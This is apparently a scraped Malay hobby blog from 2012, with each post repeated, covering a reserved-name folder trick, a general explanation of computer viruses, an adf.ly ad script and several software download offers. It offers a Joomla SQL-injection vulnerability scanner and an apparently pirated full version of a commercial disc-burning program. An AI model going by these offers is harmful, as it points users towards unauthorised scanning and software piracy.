Ok . selepas korang tekan enter . Di dalam local disk D: akan tercipta satu folder yang bernama Ipti .

Untuk memasukan File ke dalam folder ni . korang cuma boleh memasukan ke dalam folder tsb . Right klik dan new ./ Notepad ./ Folder ./ Etc .

Ok . Untuk folder ni . korang kena taip ni di dalam CMD

D:\> taip rd \lpt1\\ dan [Enter]

Itu sahaja .

p/s : Sebelum korang delete folder ni . korang kena delete semua file yang ada folder tu

Ada masaalah ? Contact Saya dekat Facebook : Seth Erry

Monday, April 23, 2012

Cewah Hacking : Joomla Security Scanner

Salam Sejahtera semua .

Hari Ni Seth nak share korang satu software untuk scan vulnerable kepada Sqli Injection . Joomla plaform dan lain lain .
http://desmond.imageshack.us/Himg703/scaled.php?server=703&filename=jvsd.jpg&res=landing

Download Sini
Salam Sejahtera semua .

Hari Ni Seth nak share korang satu software untuk scan vulnerable kepada Sqli Injection . Joomla plaform dan lain lain .
http://desmond.imageshack.us/Himg703/scaled.php?server=703&filename=jvsd.jpg&res=landing

Download Sini

Cewah Hacking : Tweak Logon

Salam Sejahtera


Hari ni seth nak kongsi satu software untuk tukar gambar ada startup Destop Korang . yang waktu korang buka laptop . akan keluar masukan password . software ni berfungsi untuk ubah background belakang tu . so korang pandai pandai la explore k .http://www.neowin.net/images/uploaded/logon-preview.PNG

Download Sini
Salam Sejahtera


Hari ni seth nak kongsi satu software untuk tukar gambar ada startup Destop Korang . yang waktu korang buka laptop . akan keluar masukan password . software ni berfungsi untuk ubah background belakang tu . so korang pandai pandai la explore k .http://www.neowin.net/images/uploaded/logon-preview.PNG

Download Sini

Cewah Hacking : Apakah Itu virus ?




Virus komputer adalah nama yang diambil dari virus biologi, merupakan program komputer yang berupaya menyalin dirinya sendiri dan menjangkiti komputer tanpa kebenaran ataupun pengetahuan pengguna. Bagaimanapun perkataan virus biasanya digunakan bagi merujuk kepada pelbagai jenis perisian perosak yang berlainan. Virus yang asal mungkin mengubah suai salinannya atau salinan itu sendiri yang mengubah suai dirinya, seperti dalam virus metamorf. Virus hanya boleh tersebar apabila hosnya sampai ke komputer lain, contohnya melalui rangkaian atau perantara mudah alih seperti cakera liut, cakera padat atau pemacu kilat USB. Selain itu, virus juga boleh merebak dengan menjangkiti fail pada sistem fail rangkaian atau mana-mana sistem fail yang dicapai komputer lain.

http://2.bp.blogspot.com/-Qh4k6LYnGAc/TdlGfO5Si8I/AAAAAAAAAVU/AjRWzFo7ZFc/s1600/computer-virus-picturejpg.jpg
Sesetengah virus direka untuk menjejaskan komputer dengan merosakkan atur cara, menghapuskan fail, atau memformat semula cakera keras, manakala virus-virus yang lain direka bukan untuk merosakkan apa-apa, tetapi hanya untuk menyalin diri dan mungkin untuk menonjolkan kewujudannya melalui pemaparan teks, video, atau pesanan audio. Walaupun virus yang kedua ini tidak berbahaya, ia juga boleh menimbulkan masalah kepada pengguna komputer kerana ia menelan ingatan komputer yang digunakan oleh atur cara yang sah. Oleh yang demikian, ia seringnya mengakibatkan tindakan yang tidak menentu dan boleh mengakibatkan kerosakan sistem. Selain itu, banyak virus juga mengandungi pepijat yang boleh mengakibatkan kerosakan sistem dan kehilangan data.


Virus komputer kekadangnya dikelirukan dengan cecacing komputer dan kuda Trojan. Kedua-dua ini berbeza dari segi bahawa cecacing boleh merebak ke komputer yang lain tanpa memerlukannya dipindahkan sebagai sebahagian fail perumah, manakala kuda Trojan adalah fail yang kelihatan tidak berbahaya sehingga dilaksanakan. Berbeza dengan virus, kuda Trojan juga tidak memasukkan kodnya ke dalam fail-fail komputer yang lain.
http://www.ganggeek.com/wp-content/uploads/2012/03/computer-virus.jpg

Banyak komputer peribadi kini dihubungkan dengan internet serta rangkaian kawasan setempat dan dengan itu, memudahkan perebakan virus. Ia mengambil kesempatan yang diberikan oleh perkhidmatan rangkaian seperti sistem-sistem Jaringan Sejagat, e-mel, dan pengongsian fail untuk merebak dan dengan itu, mengaburi perbezaan antara virus dengan cecacing komputer. Tambahan pula, sesetengah sumber menggunakan istilah alternatif yang mentakrifkan virus sebagai mana-mana bentuk perisian jahat penyalinan diri!



Virus komputer adalah nama yang diambil dari virus biologi, merupakan program komputer yang berupaya menyalin dirinya sendiri dan menjangkiti komputer tanpa kebenaran ataupun pengetahuan pengguna. Bagaimanapun perkataan virus biasanya digunakan bagi merujuk kepada pelbagai jenis perisian perosak yang berlainan. Virus yang asal mungkin mengubah suai salinannya atau salinan itu sendiri yang mengubah suai dirinya, seperti dalam virus metamorf. Virus hanya boleh tersebar apabila hosnya sampai ke komputer lain, contohnya melalui rangkaian atau perantara mudah alih seperti cakera liut, cakera padat atau pemacu kilat USB. Selain itu, virus juga boleh merebak dengan menjangkiti fail pada sistem fail rangkaian atau mana-mana sistem fail yang dicapai komputer lain.

http://2.bp.blogspot.com/-Qh4k6LYnGAc/TdlGfO5Si8I/AAAAAAAAAVU/AjRWzFo7ZFc/s1600/computer-virus-picturejpg.jpg
Sesetengah virus direka untuk menjejaskan komputer dengan merosakkan atur cara, menghapuskan fail, atau memformat semula cakera keras, manakala virus-virus yang lain direka bukan untuk merosakkan apa-apa, tetapi hanya untuk menyalin diri dan mungkin untuk menonjolkan kewujudannya melalui pemaparan teks, video, atau pesanan audio. Walaupun virus yang kedua ini tidak berbahaya, ia juga boleh menimbulkan masalah kepada pengguna komputer kerana ia menelan ingatan komputer yang digunakan oleh atur cara yang sah. Oleh yang demikian, ia seringnya mengakibatkan tindakan yang tidak menentu dan boleh mengakibatkan kerosakan sistem. Selain itu, banyak virus juga mengandungi pepijat yang boleh mengakibatkan kerosakan sistem dan kehilangan data.


Virus komputer kekadangnya dikelirukan dengan cecacing komputer dan kuda Trojan. Kedua-dua ini berbeza dari segi bahawa cecacing boleh merebak ke komputer yang lain tanpa memerlukannya dipindahkan sebagai sebahagian fail perumah, manakala kuda Trojan adalah fail yang kelihatan tidak berbahaya sehingga dilaksanakan. Berbeza dengan virus, kuda Trojan juga tidak memasukkan kodnya ke dalam fail-fail komputer yang lain.
http://www.ganggeek.com/wp-content/uploads/2012/03/computer-virus.jpg

Banyak komputer peribadi kini dihubungkan dengan internet serta rangkaian kawasan setempat dan dengan itu, memudahkan perebakan virus. Ia mengambil kesempatan yang diberikan oleh perkhidmatan rangkaian seperti sistem-sistem Jaringan Sejagat, e-mel, dan pengongsian fail untuk merebak dan dengan itu, mengaburi perbezaan antara virus dengan cecacing komputer. Tambahan pula, sesetengah sumber menggunakan istilah alternatif yang mentakrifkan virus sebagai mana-mana bentuk perisian jahat penyalinan diri!

Cewah Hacking : Ashampoo Burning Studio v10.0.15 Final - Multilingual - Full

Salam sejahtera


Hari ni seth nak kongsi satu software untuk burn disc . sangat berguna . kalau korang nak korang boleh download .




Download Sini
Salam sejahtera


Hari ni seth nak kongsi satu software untuk burn disc . sangat berguna . kalau korang nak korang boleh download .




Download Sini

Sunday, April 22, 2012

Cewah Hacking : Cara buat Pop Up Adly ads dekat blog

http://fastgush.com/wp-content/uploads/adly-logo.png

Salam Sejahtera semua

hari ni seth nak ajar korang cara buat Pop p script dekat blog ./ wordpress ./ website ./ forum dan lain lain .

Maukan Kode ni :

<script>
var adfly_id = Tukar ke Id korang;
var adfly_advert = 'int';
var frequency_cap = 5;
var frequency_delay = 5;
var init_delay = 3;
</script>
<script src="http://adf.ly/js/entry.js"></script>

Masukan dalam Pop Up box s ataupun dalam Html Korang .

Automatik akan masuk dalam adly ads korang . peace
http://fastgush.com/wp-content/uploads/adly-logo.png

Salam Sejahtera semua

hari ni seth nak ajar korang cara buat Pop p script dekat blog ./ wordpress ./ website ./ forum dan lain lain .

Maukan Kode ni :

<script>
var adfly_id = Tukar ke Id korang;
var adfly_advert = 'int';
var frequency_cap = 5;
var frequency_delay = 5;
var init_delay = 3;
</script>
<script src="http://adf.ly/js/entry.js"></script>

Masukan dalam Pop Up box s ataupun dalam Html Korang .

Automatik akan masuk dalam adly ads korang . peace
 

About

Site Info

Related Posts Plugin for WordPress, Blogger...

tutors Copyright © 2009 Community is Designed by Bie Converted To Community Galleria by Cool Tricks N Tips